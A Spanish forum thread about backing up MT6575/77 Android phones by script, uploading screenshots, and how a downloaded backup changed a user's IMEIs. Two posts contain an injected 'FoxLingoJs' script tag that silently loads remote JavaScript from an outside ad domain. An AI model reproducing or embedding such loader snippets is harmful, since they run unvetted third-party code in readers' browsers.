Backup MT6575/77 con script android 2.3.6 y 4.0.

Re: Backup MT6575 con script android 2.3.6.

@felissan, la foto no se distingue ningun nombre. No se vee.

Debes de revisar que ningún archivo este con 0 kb y que el system.img tenga un valor de 100.000kb o mas.

Saludos.
 
Última edición por un moderador:
@felissan, la foto no se distingue ningun nombre. No se vee.

Debes de revisar que ningún archivo este con 0 kb y que el system.img tenga un valor de 100.000kb o mas.

Saludos.

Buenos dias @Breakk, como hago para que se vea mas grande y de calidad?
Ningun archivo esta a0 kb y el system es de mas de 100.000kb:blush:

Enviado desde mi e1808_v75_jbl1 usando Tapatalk 2
 
Última edición por un moderador:
Re: Backup MT6575 con script android 2.3.6.

Buenos dias @breakk, como hago para que se vea mas grande y de calidad?
Ningun archivo esta a0 kb y el system es de mas de 100.000kb:blush:

Enviado desde mi e1808_v75_jbl1 usando Tapatalk 2

Genial! Ya podemos sacar firmwares de los nuevos móviles con el root, el recovery y los servicios de Google instalados, y limpios de aplicaciones chinas. Incluso con algún "parche" para compatibilidad de app, o para cambiar el montaje de las SD.


Para subir imágenes yo uso imageshack. Creo que te dan 100 o 200 imágenes y luego ya debes crearte una cuenta premium de pago (unos 2 o 3$ al mes).
Pero vamos, como en Dropbox: te vas asociando distintas cuentas de mail.
Una vez la subes copias el "enlace directo" y lo pegas aquí (icono de imagen de la barra):

img259.imageshack.us_img259_6546_201209011258.png

img214.imageshack.us_img214_7670_201209011258001.png


También puedes copiar el HTML de "Forums" pero quítale la terminación: "...By ...URL=http://profile.imageshack.us/user/egalindo3]egalindo3[/URL] at 2012-09-01"

Desmarcando la casilla "Retrieve..".
A menudo las miniaturas no se ven bien (thumbnail). Dependerá del tamaño de la captura original.


Y luego uso Jing (programa para pantallazos de escritorio y añadir flechitas y cajas de textos), o con el teclado del ordenador: apretar ctrol+impr pant (o alt+impr pantalla, fn+impr.pantalla...) y con Paint la recortas, si sólo quieres mostrar una zona, una ventanita, y no todo el escritorio, que además sería enorme.

2012-09-01_1308.jpg

Fíjate la diferencia respecto de subirla mediante enlace a servidor:
img856.imageshack.us_img856_8577_201209011308.png


Paint permite poner barritas gruesas para tapar datos personales como IMEIs, etc. o seleccionar un trozo de foto (p.e. un color de fondo) y pegarlo encima de algún objeto para taparlo y que parezca una continuación del fondo.
Es muy rudimentario, al lado de Photoshop u otros, pero para estas cosas básicas cumple su cometido.

P.e. aquí tapo la marca "Belkin" pegando un trocito del negro de alrededor encima

img715.imageshack.us_img715_5830_444121356292.jpg

img822.imageshack.us_img822_9626_201209011328.png

img100.imageshack.us_img100_2604_444121356292copia.jpg


2012-09-01_1308.jpg
 
Última edición por un moderador:
Re: Backup MT6575 con script android 2.3.6.

Y la última opción es añadir una foto pero como adjunto, no como minitatura desde el gestor de imágenes.

Debajo del post te vas a "Avanzado" / Añadir archivos adjuntos / lo subes al servidor y lo arrastras a la barra inferior: done o Insert line.
Aparece abajo. Creo que es lo que has hecho tú, pero el tamaño en que se visualizará tb dependerá del original. En este caso igual de pequeña.
En cambio fíjate en la segunda, que usé para la review del Lenovo A789. Se ve grande porque la foto era de 3MB o así, era grande.

2012-09-01_1308.jpg


IMG_2895.JPG
 
Última edición:
ok @pauete y @Breakk, yo tengo photoscape, no tengo practica con el, haber si nos hacemos amigos.
Le instale un backup al n8000 que me descargue de un foro y me cambio los imeis, pasa lo mismo con gscript?

Un saludo y gracis


Enviado desde mi e1808_v75_jbl1 usando Tapatalk 2
 
Última edición por un moderador:
Re: Backup MT6575 con script android 2.3.6.

ok @pauete y @breakk, yo tengo photoscape, no tengo practica con el, haber si nos hacemos amigos.
Le instale un backup al n8000 que me descargue de un foro y me cambio los imeis, pasa lo mismo con gscript?

Un saludo y gracis


Enviado desde mi e1808_v75_jbl1 usando Tapatalk 2

Hola, perdona pero no he visto la mencion.

Mira, yo uso para subir fotos http://photobucket.com/, es parecida a la que dice pauete.

Para subir fotos al foro por medio del gestor del foro, a mi tambien a veces me lo coloca como miniaturas.

Si te aparece abajo del post con miniaturas, tienes que entrar en editar y luego en opciones avanzadas, te vas a gestion de archivos o imagenes(te lo digo de memoria, luego miro) y eliminarla. La vuelves a subir pero esta vez por medio de
img214.imageshack.us_img214_7670_201209011258001.png


Marcando From computer, buscas la imagen y le das a subir. Cuando te aparece el simbolo v de verde, guardas el hilo. Luego vuelves a editarlo, te pones encima de la foto y haces dos clics, en la ventana que te sale de las a toda la pagina o full (ahora te digo) y asi se verá grande.

2012-09-01_1939_001.png 2012-09-01_1934.jpg

Saludos.


<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

2012-09-01_1934.jpg


2012-09-01_1939_001.png
 
Última edición por un moderador:
Re: Backup MT6575 con script android 2.3.6.

@felissan, ese backup lo subistes por recovery o por flashtool?

Si lo subes por recovery puede cambiarte los imeis aunque no debiera porque solamente estas subiendo el system y algun archivo mas complementario.

En el caso de flashtool, tiene sque tener la precaucion de que si subes una rom que no es de tu movil o modelo, no marques mas que system.img y en algunos casos concretos boot.img y uboot.img. Como marques el mvram.img o data.img te va a cambiar los imeis porque estan en estos archivos.

Saludos.<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>
 
Última edición por un moderador:
Hola @Breakk, es un backup echo con el rekovery, luego le restaure uno echo por mi con el mismo metodo y volvieron los imeis.


Enviado desde mi e1808_v75_jbl1 usando Tapatalk 2
 
Última edición por un moderador:
Re: Backup MT6575 con script android 2.3.6.

Al "dueño" de ese backup le habrán desaparecido los suyos, no?
:blush:
 
Al "dueño" de ese backup le habrán desaparecido los suyos, no?
:blush:

Supongo que si,pero yo no los tengo ehhh jejeje.
Sera peligroso subir estos backups, yo hice un restore y voila volvieron los mios.
Supongo que algo habra que eliminar antes de subirlo.
En uno de los ext. hay unos archivos nvram, habra que eliminarlos?

Enviado desde mi e1808_v75_jbl1 usando Tapatalk 2
 
Re: Backup MT6575 con script android 2.3.6.

Supongo que si,pero yo no los tengo ehhh jejeje.
Sera peligroso subir estos backups, yo hice un restore y voila volvieron los mios.
Supongo que algo habra que eliminar antes de subirlo.
En uno de los ext. hay unos archivos nvram, habra que eliminarlos?
Creo que sí, como también "data", si es que hay algo tuyo (alguna contraseña, los mails).
Pero si los eliminas a saco el restore no funciona. Quizá haya que reemplazar determinados archivos, como los q contienen tus IMEIs.
 
Hola compañeros:

A mi no me ha funcionado. El script no me reconoce el archivo " back_mt6577_v2a.sh".


Explico como lo hecho.

Instalo el script, lo abro, voy al menú y le digo "add script", le pongo el nombre de "back_mt6577_v2a.sh", está marcado "Nedd SU?", también lo he desmarcado y tampoco hace nada, le doy a "Load file", me sale un pantalla negra donde dice "Select file(.sh from sdcard) y se supone que tendría que salir debajo el archivo,
pero no sale nada, sólo sale abajo del todo un botón que dice "Cancel".

Tengo instalado, el busybox, soy root...

Si me podéis decir que hago mal o que se me ha pasado.

Saludos y gracias por todo.
 

Del blog

Es tendencia

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba